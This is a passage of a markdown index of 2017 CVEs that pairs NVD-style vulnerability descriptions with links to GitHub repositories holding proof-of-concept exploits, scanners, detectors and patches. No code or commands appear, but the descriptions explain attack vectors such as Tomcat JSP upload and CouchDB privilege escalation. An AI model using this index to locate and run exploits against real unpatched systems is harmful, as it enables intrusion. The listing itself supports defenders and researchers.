Vulnerability in the PeopleSoft Enterprise PT PeopleTools component of Oracle PeopleSoft Products (subcomponent: Performance Monitor). Supported versions that are affected are 8.54, 8.55 and 8.56. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PT PeopleTools. Successful attacks of this vulnerability can result in takeover of PeopleSoft Enterprise PT PeopleTools. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [blazeinfosec/CVE-2017-10366_peoplesoft](https://github.com/blazeinfosec/CVE-2017-10366_peoplesoft)
### CVE-2017-10617 (2017-10-13)
The ifmap service that comes bundled with Contrail has an XML External Entity (XXE) vulnerability that may allow an attacker to retrieve sensitive system files. Affected releases are Juniper Networks Contrail 2.2 prior to 2.21.4; 3.0 prior to 3.0.3.4; 3.1 prior to 3.1.4.0; 3.2 prior to 3.2.5.0. CVE-2017-10616 and CVE-2017-10617 can be chained together and have a combined CVSSv3 score of 5.8 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N).
- [gteissier/CVE-2017-10617](https://github.com/gteissier/CVE-2017-10617)
### CVE-2017-10661 (2017-08-19)
Race condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing.
- [GeneBlue/CVE-2017-10661_POC](https://github.com/GeneBlue/CVE-2017-10661_POC)
### CVE-2017-10797
- [n4xh4ck5/CVE-2017-10797](https://github.com/n4xh4ck5/CVE-2017-10797)
### CVE-2017-10952 (2017-08-29)
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.2.0.2051. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the saveAs JavaScript function. The issue results from the lack of proper validation of user-supplied data, which can lead to writing arbitrary files into attacker controlled locations. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4518.
- [afbase/CVE-2017-10952](https://github.com/afbase/CVE-2017-10952)
### CVE-2017-11176 (2017-07-11)
The mq_notify function in the Linux kernel through 4.11.9 does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact.
- [lexfo/cve-2017-11176](https://github.com/lexfo/cve-2017-11176)
- [DoubleMice/cve-2017-11176](https://github.com/DoubleMice/cve-2017-11176)
- [HckEX/CVE-2017-11176](https://github.com/HckEX/CVE-2017-11176)
- [leonardo1101/cve-2017-11176](https://github.com/leonardo1101/cve-2017-11176)
- [c3r34lk1ll3r/CVE-2017-11176](https://github.com/c3r34lk1ll3r/CVE-2017-11176)
- [Sama-Ayman-Mokhtar/CVE-2017-11176](https://github.com/Sama-Ayman-Mokhtar/CVE-2017-11176)
### CVE-2017-11317 (2017-08-23)
Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.
- [bao7uo/RAU_crypto](https://github.com/bao7uo/RAU_crypto)
- [KasunPriyashan/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut](https://github.com/KasunPriyashan/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut)
- [KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation](https://github.com/KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation)
- [hlong12042/CVE-2017-11317-and-CVE-2017-11357-in-Telerik](https://github.com/hlong12042/CVE-2017-11317-and-CVE-2017-11357-in-Telerik)
### CVE-2017-11366 (2017-08-21)
components/filemanager/class.filemanager.php in Codiad before 2.8.4 is vulnerable to remote command execution because shell commands can be embedded in parameter values, as demonstrated by search_file_type.
- [hidog123/Codiad-CVE-2018-14009](https://github.com/hidog123/Codiad-CVE-2018-14009)
### CVE-2017-11427 (2019-04-17)
OneLogin PythonSAML 2.3.0 and earlier may incorrectly utilize the results of XML DOM traversal and canonicalization APIs in such a way that an attacker may be able to manipulate the SAML data without invalidating the cryptographic signature, allowing the attack to potentially bypass authentication to SAML service providers.
- [CHYbeta/CVE-2017-11427-DEMO](https://github.com/CHYbeta/CVE-2017-11427-DEMO)
### CVE-2017-11503 (2017-07-20)
PHPMailer 5.2.23 has XSS in the "From Email Address" and "To Email Address" fields of code_generator.php.
- [wizardafric/download](https://github.com/wizardafric/download)
### CVE-2017-11519 (2017-07-21)
passwd_recovery.lua on the TP-Link Archer C9(UN)_V2_160517 allows an attacker to reset the admin password by leveraging a predictable random number generator seed. This is fixed in C9(UN)_V2_170511.
- [vakzz/tplink-CVE-2017-11519](https://github.com/vakzz/tplink-CVE-2017-11519)
### CVE-2017-11610 (2017-08-23)
The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.
- [ivanitlearning/CVE-2017-11610](https://github.com/ivanitlearning/CVE-2017-11610)
- [yaunsky/CVE-2017-11610](https://github.com/yaunsky/CVE-2017-11610)
### CVE-2017-11611 (2017-09-08)
Wolf CMS 0.8.3.1 allows Cross-Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization of the file name in a "create-file-popup" action, and the directory name in a "create-directory-popup" action, in the HTTP POST method to the "/plugin/file_manager/" script (aka an /admin/plugin/file_manager/browse// URI).
- [faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc](https://github.com/faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc)
### CVE-2017-11774 (2017-10-13)
Microsoft Outlook 2010 SP2, Outlook 2013 SP1 and RT SP1, and Outlook 2016 allow an attacker to execute arbitrary commands, due to how Microsoft Office handles objects in memory, aka "Microsoft Outlook Security Feature Bypass Vulnerability."
- [devcoinfet/SniperRoost](https://github.com/devcoinfet/SniperRoost)
### CVE-2017-11783 (2017-10-13)
Microsoft Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability in the way it handles calls to Advanced Local Procedure Call (ALPC), aka "Windows Elevation of Privilege Vulnerability".
- [Sheisback/CVE-2017-11783](https://github.com/Sheisback/CVE-2017-11783)
### CVE-2017-11826 (2017-10-13)
Microsoft Office 2010, SharePoint Enterprise Server 2010, SharePoint Server 2010, Web Applications, Office Web Apps Server 2010 and 2013, Word Viewer, Word 2007, 2010, 2013 and 2016, Word Automation Services, and Office Online Server allow remote code execution when the software fails to properly handle objects in memory.
- [thatskriptkid/CVE-2017-11826](https://github.com/thatskriptkid/CVE-2017-11826)
### CVE-2017-11882 (2017-11-15)
Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11884.
- [zhouat/cve-2017-11882](https://github.com/zhouat/cve-2017-11882)
- [embedi/CVE-2017-11882](https://github.com/embedi/CVE-2017-11882)
- [Ridter/CVE-2017-11882](https://github.com/Ridter/CVE-2017-11882)
- [BlackMathIT/2017-11882_Generator](https://github.com/BlackMathIT/2017-11882_Generator)
- [rip1s/CVE-2017-11882](https://github.com/rip1s/CVE-2017-11882)
- [0x09AL/CVE-2017-11882-metasploit](https://github.com/0x09AL/CVE-2017-11882-metasploit)
- [HZachev/ABC](https://github.com/HZachev/ABC)
- [starnightcyber/CVE-2017-11882](https://github.com/starnightcyber/CVE-2017-11882)
- [Grey-Li/CVE-2017-11882](https://github.com/Grey-Li/CVE-2017-11882)
- [legendsec/CVE-2017-11882-for-Kali](https://github.com/legendsec/CVE-2017-11882-for-Kali)
- [CSC-pentest/cve-2017-11882](https://github.com/CSC-pentest/cve-2017-11882)
- [Shadowshusky/CVE-2017-11882-](https://github.com/Shadowshusky/CVE-2017-11882-)
- [rxwx/CVE-2018-0802](https://github.com/rxwx/CVE-2018-0802)
- [Ridter/RTF_11882_0802](https://github.com/Ridter/RTF_11882_0802)
- [likekabin/CVE-2017-11882](https://github.com/likekabin/CVE-2017-11882)
- [likekabin/CVE-2018-0802_CVE-2017-11882](https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882)
- [herbiezimmerman/CVE-2017-11882-Possible-Remcos-Malspam](https://github.com/herbiezimmerman/CVE-2017-11882-Possible-Remcos-Malspam)
- [ChaitanyaHaritash/CVE-2017-11882](https://github.com/ChaitanyaHaritash/CVE-2017-11882)
- [qy1202/https-github.com-Ridter-CVE-2017-11882-](https://github.com/qy1202/https-github.com-Ridter-CVE-2017-11882-)
- [j0lama/CVE-2017-11882](https://github.com/j0lama/CVE-2017-11882)
- [chanbin/CVE-2017-11882](https://github.com/chanbin/CVE-2017-11882)
- [littlebin404/CVE-2017-11882](https://github.com/littlebin404/CVE-2017-11882)
- [ekgg/Overflow-Demo-CVE-2017-11882](https://github.com/ekgg/Overflow-Demo-CVE-2017-11882)
- [HaoJame/CVE-2017-11882](https://github.com/HaoJame/CVE-2017-11882)
- [ActorExpose/CVE-2017-11882](https://github.com/ActorExpose/CVE-2017-11882)
- [Retr0-code/SignHere](https://github.com/Retr0-code/SignHere)
- [lisinan988/CVE-2017-11882-exp](https://github.com/lisinan988/CVE-2017-11882-exp)
- [tzwlhack/CVE-2017-11882](https://github.com/tzwlhack/CVE-2017-11882)
- [Sunqiz/CVE-2017-11882-reproduction](https://github.com/Sunqiz/CVE-2017-11882-reproduction)
- [Abdibimantara/Maldoc-Analysis](https://github.com/Abdibimantara/Maldoc-Analysis)
- [n18dcat053-luuvannga/DetectPacket-CVE-2017-11882](https://github.com/n18dcat053-luuvannga/DetectPacket-CVE-2017-11882)
- [nhuynhuy/cve-2017-11882](https://github.com/nhuynhuy/cve-2017-11882)
- [jadeapar/Dragonfish-s-Malware-Cyber-Analysis](https://github.com/jadeapar/Dragonfish-s-Malware-Cyber-Analysis)
### CVE-2017-11907 (2017-12-12)
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.
- [AV1080p/CVE-2017-11907](https://github.com/AV1080p/CVE-2017-11907)
### CVE-2017-12149 (2017-10-04)
In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
- [sevck/CVE-2017-12149](https://github.com/sevck/CVE-2017-12149)
- [yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149)
- [1337g/CVE-2017-12149](https://github.com/1337g/CVE-2017-12149)
- [jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149)
- [Xcatolin/jboss-deserialization](https://github.com/Xcatolin/jboss-deserialization)
- [VVeakee/CVE-2017-12149](https://github.com/VVeakee/CVE-2017-12149)
- [MrE-Fog/jboss-_CVE-2017-12149](https://github.com/MrE-Fog/jboss-_CVE-2017-12149)
- [JesseClarkND/CVE-2017-12149](https://github.com/JesseClarkND/CVE-2017-12149)
### CVE-2017-12426 (2017-08-14)
GitLab Community Edition (CE) and Enterprise Edition (EE) before 8.17.8, 9.0.x before 9.0.13, 9.1.x before 9.1.10, 9.2.x before 9.2.10, 9.3.x before 9.3.10, and 9.4.x before 9.4.4 might allow remote attackers to execute arbitrary code via a crafted SSH URL in a project import.
- [sm-paul-schuette/CVE-2017-12426](https://github.com/sm-paul-schuette/CVE-2017-12426)
### CVE-2017-12542 (2018-02-15)
A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
- [skelsec/CVE-2017-12542](https://github.com/skelsec/CVE-2017-12542)
- [sk1dish/ilo4-rce-vuln-scanner](https://github.com/sk1dish/ilo4-rce-vuln-scanner)
### CVE-2017-12561 (2018-02-15)
A remote code execution vulnerability in HPE intelligent Management Center (iMC) PLAT version Plat 7.3 E0504P4 and earlier was found.
- [Everdoh/CVE-2017-12561](https://github.com/Everdoh/CVE-2017-12561)
### CVE-2017-12611 (2017-09-20)
In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.
- [brianwrf/S2-053-CVE-2017-12611](https://github.com/brianwrf/S2-053-CVE-2017-12611)
### CVE-2017-12615 (2017-09-19)
When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.
- [breaktoprotect/CVE-2017-12615](https://github.com/breaktoprotect/CVE-2017-12615)
- [mefulton/cve-2017-12615](https://github.com/mefulton/cve-2017-12615)
- [zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717](https://github.com/zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717)
- [wsg00d/cve-2017-12615](https://github.com/wsg00d/cve-2017-12615)
- [BeyondCy/CVE-2017-12615](https://github.com/BeyondCy/CVE-2017-12615)
- [1337g/CVE-2017-12615](https://github.com/1337g/CVE-2017-12615)
- [Shellkeys/CVE-2017-12615](https://github.com/Shellkeys/CVE-2017-12615)
- [cved-sources/cve-2017-12615](https://github.com/cved-sources/cve-2017-12615)
- [ianxtianxt/CVE-2017-12615](https://github.com/ianxtianxt/CVE-2017-12615)
- [cyberharsh/Tomcat-CVE-2017-12615](https://github.com/cyberharsh/Tomcat-CVE-2017-12615)
- [w0x68y/CVE-2017-12615-EXP](https://github.com/w0x68y/CVE-2017-12615-EXP)
- [tpt11fb/AttackTomcat](https://github.com/tpt11fb/AttackTomcat)
- [xiaokp7/Tomcat_PUT_GUI_EXP](https://github.com/xiaokp7/Tomcat_PUT_GUI_EXP)
- [lizhianyuguangming/TomcatScanPro](https://github.com/lizhianyuguangming/TomcatScanPro)
### CVE-2017-12617 (2017-10-03)
When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.
- [cyberheartmi9/CVE-2017-12617](https://github.com/cyberheartmi9/CVE-2017-12617)
- [devcoinfet/CVE-2017-12617](https://github.com/devcoinfet/CVE-2017-12617)
- [qiantu88/CVE-2017-12617](https://github.com/qiantu88/CVE-2017-12617)
- [ygouzerh/CVE-2017-12617](https://github.com/ygouzerh/CVE-2017-12617)
- [tyranteye666/tomcat-cve-2017-12617](https://github.com/tyranteye666/tomcat-cve-2017-12617)
- [jptr218/tc_hack](https://github.com/jptr218/tc_hack)
- [LongWayHomie/CVE-2017-12617](https://github.com/LongWayHomie/CVE-2017-12617)
- [K3ysTr0K3R/CVE-2017-12617-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-12617-EXPLOIT)
- [scirusvulgaris/CVE-2017-12617](https://github.com/scirusvulgaris/CVE-2017-12617)
- [yZ1337/CVE-2017-12617](https://github.com/yZ1337/CVE-2017-12617)
### CVE-2017-12624 (2017-11-14)
Apache CXF supports sending and receiving attachments via either the JAX-WS or JAX-RS specifications. It is possible to craft a message attachment header that could lead to a Denial of Service (DoS) attack on a CXF web service provider. Both JAX-WS and JAX-RS services are vulnerable to this attack. From Apache CXF 3.2.1 and 3.1.14, message attachment headers that are greater than 300 characters will be rejected by default. This value is configurable via the property "attachment-max-header-size".
- [tafamace/CVE-2017-12624](https://github.com/tafamace/CVE-2017-12624)
### CVE-2017-12635 (2017-11-14)
Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
- [assalielmehdi/CVE-2017-12635](https://github.com/assalielmehdi/CVE-2017-12635)
- [cyberharsh/Apache-couchdb-CVE-2017-12635](https://github.com/cyberharsh/Apache-couchdb-CVE-2017-12635)
- [Weisant/CVE-2017-12635-POC](https://github.com/Weisant/CVE-2017-12635-POC)
### CVE-2017-12636 (2017-11-14)
CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.
- [moayadalmalat/CVE-2017-12636](https://github.com/moayadalmalat/CVE-2017-12636)
- [XTeam-Wing/CVE-2017-12636](https://github.com/XTeam-Wing/CVE-2017-12636)
### CVE-2017-12792 (2017-10-02)
Multiple cross-site request forgery (CSRF) vulnerabilities in NexusPHP 1.5 allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) linkname, (2) url, or (3) title parameter in an add action to linksmanage.php.
- [ZZS2017/cve-2017-12792](https://github.com/ZZS2017/cve-2017-12792)
### CVE-2017-12852 (2017-08-15)
The numpy.pad function in Numpy 1.13.1 and older versions is missing input validation. An empty list or ndarray will stick into an infinite loop, which can allow attackers to cause a DoS attack.
- [BT123/numpy-1.13.1](https://github.com/BT123/numpy-1.13.1)
### CVE-2017-12943 (2017-08-18)
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.
- [aymankhalfatni/D-Link](https://github.com/aymankhalfatni/D-Link)
- [d4rk30/CVE-2017-12943](https://github.com/d4rk30/CVE-2017-12943)
### CVE-2017-12945 (2019-11-27)
Insufficient validation of user-supplied input for the Solstice Pod before 2.8.4 networking configuration enables authenticated attackers to execute arbitrary commands as root.
- [aress31/cve-2017-12945](https://github.com/aress31/cve-2017-12945)
### CVE-2017-13089 (2017-10-27)
The http.c:skip_short_body() function is called in some circumstances, such as when processing redirects. When the response is sent chunked in wget before 1.19.2, the chunk parser uses strtol() to read each chunk's length, but doesn't check that the chunk length is a non-negative number. The code then tries to skip the chunk in pieces of 512 bytes by using the MIN() macro, but ends up passing the negative chunk length to connect.c:fd_read(). As fd_read() takes an int argument, the high 32 bits of the chunk length are discarded, leaving fd_read() with a completely attacker controlled length argument.
- [r1b/CVE-2017-13089](https://github.com/r1b/CVE-2017-13089)
- [mzeyong/CVE-2017-13089](https://github.com/mzeyong/CVE-2017-13089)
### CVE-2017-13156 (2017-12-06)
An elevation of privilege vulnerability in the Android system (art). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-64211847.
- [xyzAsian/Janus-CVE-2017-13156](https://github.com/xyzAsian/Janus-CVE-2017-13156)
- [caxmd/CVE-2017-13156](https://github.com/caxmd/CVE-2017-13156)
- [giacomoferretti/janus-toolkit](https://github.com/giacomoferretti/janus-toolkit)
- [tea9/CVE-2017-13156-Janus](https://github.com/tea9/CVE-2017-13156-Janus)
- [M507/CVE-2017-13156](https://github.com/M507/CVE-2017-13156)
- [nahid0x1/Janus-Vulnerability-CVE-2017-13156-Exploit](https://github.com/nahid0x1/Janus-Vulnerability-CVE-2017-13156-Exploit)
### CVE-2017-13208 (2018-01-12)
In receive_packet of libnetutils/packet.c, there is a possible out-of-bounds write due to a missing bounds check on the DHCP response. This could lead to remote code execution as a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1. Android ID: A-67474440.
- [idanshechter/CVE-2017-13208-Scanner](https://github.com/idanshechter/CVE-2017-13208-Scanner)
### CVE-2017-13253 (2018-04-04)
In CryptoPlugin::decrypt of CryptoPlugin.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: 8.0, 8.1. Android ID: A-71389378.
- [tamirzb/CVE-2017-13253](https://github.com/tamirzb/CVE-2017-13253)
### CVE-2017-13286 (2018-04-04)
In writeToParcel and readFromParcel of OutputConfiguration.java, there is a permission bypass due to mismatched serialization. This could lead to a local escalation of privilege where the user can start an activity with system privileges, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: 8.0, 8.1. Android ID: A-69683251.
- [UmVfX1BvaW50/CVE-2017-13286](https://github.com/UmVfX1BvaW50/CVE-2017-13286)
### CVE-2017-13672 (2017-09-01)
QEMU (aka Quick Emulator), when built with the VGA display emulator support, allows local guest OS privileged users to cause a denial of service (out-of-bounds read and QEMU process crash) via vectors involving display update.
- [DavidBuchanan314/CVE-2017-13672](https://github.com/DavidBuchanan314/CVE-2017-13672)
### CVE-2017-13868 (2017-12-25)
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.
- [bazad/ctl_ctloutput-leak](https://github.com/bazad/ctl_ctloutput-leak)
### CVE-2017-13872 (2017-11-29)
An issue was discovered in certain Apple products. macOS High Sierra before Security Update 2017-001 is affected. The issue involves the "Directory Utility" component. It allows attackers to obtain administrator access without a password via certain interactions involving entry of the root user name.
- [giovannidispoto/CVE-2017-13872-Patch](https://github.com/giovannidispoto/CVE-2017-13872-Patch)
### CVE-2017-14105 (2017-09-01)
HiveManager Classic through 8.1r1 allows arbitrary JSP code execution by modifying a backup archive before a restore, because the restore feature does not validate pathnames within the archive. An authenticated, local attacker - even restricted as a tenant - can add a jsp at HiveManager/tomcat/webapps/hm/domains/$yourtenant/maps (it will be exposed at the web interface).
- [theguly/CVE-2017-14105](https://github.com/theguly/CVE-2017-14105)
### CVE-2017-14262 (2017-09-11)
On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and login to the device with that hash in the szUserPasswd parameter.
- [zzz66686/CVE-2017-14262](https://github.com/zzz66686/CVE-2017-14262)
### CVE-2017-14263 (2017-09-11)
Honeywell NVR devices allow remote attackers to create a user account in the admin group by leveraging access to a guest account to obtain a session ID, and then sending that session ID in a userManager.addUser request to the /RPC2 URI. The attacker can login to the device with that new user account to fully control the device.
- [zzz66686/CVE-2017-14263](https://github.com/zzz66686/CVE-2017-14263)
### CVE-2017-14322 (2017-10-18)
The function in charge to check whether the user is already logged in init.php in Interspire Email Marketer (IEM) prior to 6.1.6 allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie with a specially crafted value.
- [joesmithjaffa/CVE-2017-14322](https://github.com/joesmithjaffa/CVE-2017-14322)
### CVE-2017-14491 (2017-10-02)
Heap-based buffer overflow in dnsmasq before 2.78 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted DNS response.
- [skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491](https://github.com/skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491)
### CVE-2017-14493 (2017-10-02)
Stack-based buffer overflow in dnsmasq before 2.78 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted DHCPv6 request.
- [pupiles/bof-dnsmasq-cve-2017-14493](https://github.com/pupiles/bof-dnsmasq-cve-2017-14493)
### CVE-2017-14719 (2017-09-23)
Before version 4.8.2, WordPress was vulnerable to a directory traversal attack during unzip operations in the ZipArchive and PclZip components.
- [PalmTreeForest/CodePath_Week_7-8](https://github.com/PalmTreeForest/CodePath_Week_7-8)
### CVE-2017-14948 (2019-10-14)
Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with ''boundary=' followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution.
- [badnack/d_link_880_bug](https://github.com/badnack/d_link_880_bug)
### CVE-2017-14954 (2017-10-01)
The waitid implementation in kernel/exit.c in the Linux kernel through 4.13.4 accesses rusage data structures in unintended cases, which allows local users to obtain sensitive information, and bypass the KASLR protection mechanism, via a crafted system call.
- [echo-devim/exploit_linux_kernel4.13](https://github.com/echo-devim/exploit_linux_kernel4.13)
### CVE-2017-14980 (2017-10-09)
Buffer overflow in Sync Breeze Enterprise 10.0.28 allows remote attackers to have unspecified impact via a long username parameter to /login.
- [TheDarthMole/CVE-2017-14980](https://github.com/TheDarthMole/CVE-2017-14980)
### CVE-2017-15099 (2017-11-22)
INSERT ... ON CONFLICT DO UPDATE commands in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, and 9.5.x before 9.5.10 disclose table contents that the invoker lacks privilege to read. These exploits affect only tables where the attacker lacks full read access but has both INSERT and UPDATE privileges. Exploits bypass row level security policies and lack of SELECT privilege.
- [ToontjeM/CVE-2017-15099](https://github.com/ToontjeM/CVE-2017-15099)
### CVE-2017-15120 (2018-07-27)
An issue has been found in the parsing of authoritative answers in PowerDNS Recursor before 4.0.8, leading to a NULL pointer dereference when parsing a specially crafted answer containing a CNAME of a different class than IN. An unauthenticated remote attacker could cause a denial of service.
- [shutingrz/CVE-2017-15120_PoC](https://github.com/shutingrz/CVE-2017-15120_PoC)
### CVE-2017-15277 (2017-10-12)
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
- [hexrom/ImageMagick-CVE-2017-15277](https://github.com/hexrom/ImageMagick-CVE-2017-15277)
### CVE-2017-15303 (2017-10-16)
In CPUID CPU-Z before 1.43, there is an arbitrary memory write that results directly in elevation of privileges, because any program running on the local machine (while CPU-Z is running) can issue an ioctl 0x9C402430 call to the kernel-mode driver (e.g., cpuz141_x64.sys for version 1.41).
- [hfiref0x/Stryker](https://github.com/hfiref0x/Stryker)
### CVE-2017-15361 (2017-10-16)
The Infineon RSA library 1.02.013 in Infineon Trusted Platform Module (TPM) firmware, such as versions before 0000000000000422 - 4.34, before 000000000000062b - 6.43, and before 0000000000008521 - 133.33, mishandles RSA key generation, which makes it easier for attackers to defeat various cryptographic protection mechanisms via targeted attacks, aka ROCA. Examples of affected technologies include BitLocker with TPM 1.2, YubiKey 4 (before 4.3.5) PGP key generation, and the Cached User Data encryption feature in Chrome OS.
- [lva/Infineon-CVE-2017-15361](https://github.com/lva/Infineon-CVE-2017-15361)
- [titanous/rocacheck](https://github.com/titanous/rocacheck)
- [nsacyber/Detect-CVE-2017-15361-TPM](https://github.com/nsacyber/Detect-CVE-2017-15361-TPM)
- [0xxon/zeek-plugin-roca](https://github.com/0xxon/zeek-plugin-roca)
- [0xxon/roca](https://github.com/0xxon/roca)
- [Elbarbons/ROCA-attack-on-vulnerability-CVE-2017-15361](https://github.com/Elbarbons/ROCA-attack-on-vulnerability-CVE-2017-15361)
### CVE-2017-15394 (2018-02-07)
Insufficient Policy Enforcement in Extensions in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to perform domain spoofing in permission dialogs via IDN homographs in a crafted Chrome Extension.
- [sudosammy/CVE-2017-15394](https://github.com/sudosammy/CVE-2017-15394)
### CVE-2017-15428 (2019-01-09)
Insufficient data validation in V8 builtins string generator could lead to out of bounds read and write access in V8 in Google Chrome prior to 62.0.3202.94 and allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.
- [w1ldb1t/CVE-2017-15428](https://github.com/w1ldb1t/CVE-2017-15428)
### CVE-2017-15708 (2017-12-11)
In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version.
- [HuSoul/CVE-2017-15708](https://github.com/HuSoul/CVE-2017-15708)
### CVE-2017-15715 (2018-03-26)
